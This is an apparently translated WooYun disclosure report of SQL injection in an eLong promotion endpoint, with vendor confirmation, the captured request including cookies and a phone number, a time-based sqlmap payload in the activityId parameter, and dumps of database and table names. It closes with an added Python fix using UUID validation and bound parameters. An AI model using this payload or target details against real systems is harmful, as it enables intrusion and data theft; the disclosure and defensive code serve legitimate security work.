Vulnerability summary
Defect ID: WooYun-2016-184247
Title: SQL injection in an eLong site, 170 tables across two databases, including user tables and administrator passwords
Vendor: 艺龙旅行网 (eLong)
Author: hear7v
Submitted: 2016-03-14 09:54
Published: 2016-04-30 13:52
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: confirmed by vendor
Source: www.wooyun.org
Tags: sql injection
Vulnerability details
Disclosure status:
2016-03-14: Details sent to the vendor; awaiting vendor handling
2016-03-16: Vendor confirmed; details visible to the vendor only
2016-03-26: Details disclosed to core white hats and domain experts
2016-04-05: Details disclosed to regular white hats
2016-04-15: Details disclosed to intern white hats
2016-04-30: Details disclosed to the public
Brief description:
It's been a long time since I submitted a hole on WooYun. A certain eLong site has SQL injection: two databases, 170 tables, a large amount of user information, administrator passwords and other data exposed. How about a spot on the front page?
Detailed description:
{"target": "http://mhuodong.elong.com/PromotionJson/GetSmsCode", "agent": "Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI ALE-CL00 Build/HuaweiALE-CL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 ewandroid/9.9.1", "referer": null, "report": "", "cookie": "H5SessionId=3dbcc29e-c256-4234-8570-eda034ce26cc; H5Channel=ewhtml5%2cDefault; H5CookieId_s=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; H5CookieId=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; route=b0c9360f937aba159859a160623bc8de; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; NSC_NCBQQEXOME_80=ffffffffaf1d13b445525d5f4f58455e445a4a4229a0", "data": "activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&mobile=18980144019&gCode="}
Proof of vulnerability:
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: activityId (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: activityId (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] test
[*] weixinpacket
Database: test
[163 tables]
+-----------------------------+
| BDDJoueurs |
| Booked_On |
| Campus |
| CodeRuleType |
| DEPARTAMENTO |
| DWE_Predecessors |
| D_Abbreviation |
| D_EM_DESTINATARIO |
| D_Format_Data |
| Descriptions_Languages |
| EMPLEADO |
| Equipment |
| LT_CUSTOM1 |
| LT_CUSTOM2 |
| LT_CUSTOM3 |
| LT_CUSTOM4 |
| LT_GRUPO |
| MM_USUARIOS_DO_PROCESSO |
| Model |
| POINT |
| Parametre |
| PostalAddress |
| Propdesc_table |
| Property |
| RATING |
| ROLE_PERM |
| SYNALLAGI |
| S_SESSOES |
| StateType |
| Station_Data |
| THOT_YEAR |
| UM_ROLE_ATTRIBUTES |
| Users |
| null |
| size |
| access_control |
| account_multi |
| account_transaction |
| accountuser |
| acctmanager |
| actualites |
| admin_psw |
| artikel_variationsgruppen |
| basePlusCommissionEmployees |
| binn_articles |
| binn_bann_temps |
| binn_catlinks |
| binn_cform_settings |
| binn_docs_temps |
| binn_faq_temps |
| binn_forum_threads |
| binn_news |
| binn_rubrikator_tlevel |
| binn_system_messages |
| binn_vote_results |
| cdb_announcements |
| cdb_attachments |
| cdb_banned |
| cdb_debates |
| cdv_curated_allele |
| cocktail_person |
| combustiblebois |
| connections |
| contador_empresa |
| convite |
| copytest |
| curso |
| dados_familia |
| dados_prefeitura |
| decodifica_tabelle |
| despesa_familia |
| div_treatment |
| dtb_bat_order_daily_age |
| dtb_send_customer |
| economy |
| email |
| emailinfo |
| enrolls |
| ew_gruppi |
| ezsearch_return_count_new |
| ezsearch_search_phrase_new |
| f_spatialcontext |
| files |
| forum_user_stat |
| gd |
| geo_lake |
| gl |
| greylist |
| hardware |
| house_extensions |
| ibf_members |
| images |
| instituicao |
| ippaths |
| jforum_posts |
| jforum_ranks |
| jiveID |
| jos_polls |
| jos_respuestas |
| jos_vm_orders |
| kauf_artikel |
| kontakt |
| logradouro |
| m_data |
| mehrwertsteuer |
| mein_doc |
| mtb_zip |
| mymps_certification |
| mymps_member_tpl |
| mymps_upload |
| nuke_journal |
| nuke_links_categories |
| nuke_message |
| nuke_related |
| nuke_topics |
| nuke_users_temp |
| officer |
| osc_products |
| partsgroup |
| perfil |
| photo |
| phpbb_confirm |
| phpbb_search_results |
| phpbb_themes_name |
| pictures |
| post |
| pricegroup |
| problem |
| queue_info |
| redirect |
| reserve |
| riddles |
| routerbenchmarks |
| serie |
| site_environment |
| site_location |
| soc_da_polit_ge |
| software |
| spip_articles |
| spip_mots_documents |
| studierende |
| sysmaps |
| sysmergeschemaarticles |
| tb_username |
| tbadmins |
| tblStones |
| tblmanagers |
| templatelinks |
| tf_rss |
| tmp |
| topic |
| trackbacks |
| trivia |
| ts2_server_privileges |
| tt_address |
| tx_tcdirectmail_targets |
| user_preferences |
| user_rights |
| valhalla |
| verkaeufer |
| webcal_group_user |
| zl_baoming |
| zl_finance |
+-----------------------------+
Database: weixinpacket
[9 tables]
+---------------------+
| dictionary |
| ew_moduli |
| imageAttribute |
| iplinks |
| maxcodevento |
| phpbb_themes |
| rating_track |
| reciprocal_admin |
| vrls_listing_images |
+---------------------+
back-end DBMS: MySQL 5.0.11
Database: test
Table: users
[14 columns]
+----------------------------+---------+
| Column | Type |
+----------------------------+---------+
| caroline-du-nord | numeric |
| adminpass | numeric |
| fldfuntype | numeric |
| id_refferer | numeric |
| idricoverohatipologia | numeric |
| mod_virtuemart_featureprod | numeric |
| shared_secret | numeric |
| sub | numeric |
| sub_comment1 | numeric |
| sub_comment5 | numeric |
| tutor | numeric |
| uname | numeric |
| version_min | numeric |
| zid | numeric |
+----------------------------+---------+
Remediation:
Filter input.
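The injection point is the activityId POST parameter, which the application evidently splices into a MySQL query as a string. A one-word "filter" fix is easy to get wrong, so the following added example (not code from the report or from eLong) shows the two layers a defender would actually want: an allow-list check that the parameter is a canonical UUID, the only shape a legitimate activityId takes in the captured request, and parameter binding so that even a value that slips past validation is sent to the database as data rather than as SQL. The activity table, its column names, the GetSmsCode handler stand-in and the use of sqlite3 in place of MySQL are all assumptions made for this example.

```python
"""Added example, not part of the WooYun report: allow-list validation of
activityId plus parameterised lookup.  Table, column and handler names are
constructed for the example; sqlite3 stands in for the MySQL back end."""
import re
import sqlite3

# Canonical 8-4-4-4-12 hex UUID: the only form activityId is expected to take.
UUID_RE = re.compile(r"^[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")

# Values taken from the report: the legitimate id and the sqlmap payload form.
VALID_ID = "65698945-4ed7-4e70-9078-fae5a80c78fe"
PAYLOAD = "65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#"


def is_valid_activity_id(value: str) -> bool:
    """Allow-list check: anything that is not a bare UUID is rejected."""
    return bool(value) and UUID_RE.fullmatch(value) is not None


def build_db() -> sqlite3.Connection:
    """Constructed in-memory activity table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activity (id TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO activity VALUES (?, ?)", (VALID_ID, "spring promo"))
    conn.commit()
    return conn


def lookup_activity_bound(conn: sqlite3.Connection, activity_id: str) -> list:
    """Second layer on its own: the driver binds the value as data, so the
    payload is compared literally against the id column and matches nothing."""
    rows = conn.execute("SELECT name FROM activity WHERE id = ?", (activity_id,)).fetchall()
    return [name for (name,) in rows]


def lookup_activity(conn: sqlite3.Connection, activity_id: str) -> list:
    """Both layers: reject malformed ids first, then bind the id as a parameter."""
    if not is_valid_activity_id(activity_id):
        raise ValueError("activityId must be a canonical UUID")
    return lookup_activity_bound(conn, activity_id)


def handle_get_sms_code(conn: sqlite3.Connection, activity_id: str) -> dict:
    """Stand-in for the validation step of a GetSmsCode handler (assumed)."""
    try:
        names = lookup_activity(conn, activity_id)
    except ValueError as exc:
        return {"ok": False, "error": str(exc)}
    return {"ok": True, "activities": names}


if __name__ == "__main__":
    db = build_db()
    print(handle_get_sms_code(db, VALID_ID))  # accepted, returns the activity
    print(handle_get_sms_code(db, PAYLOAD))   # rejected by the allow-list
```

Rejecting at the boundary also gives a clean detection signal: a request whose activityId fails the UUID check is worth logging, since no legitimate client sends anything else in that field.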
Copyright notice: when reposting, please credit the source hear7v@WooYun
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 13
Confirmed: 2016-03-16 13:52
Vendor reply:
Verified, thanks to the white hat!
Latest status:
None yet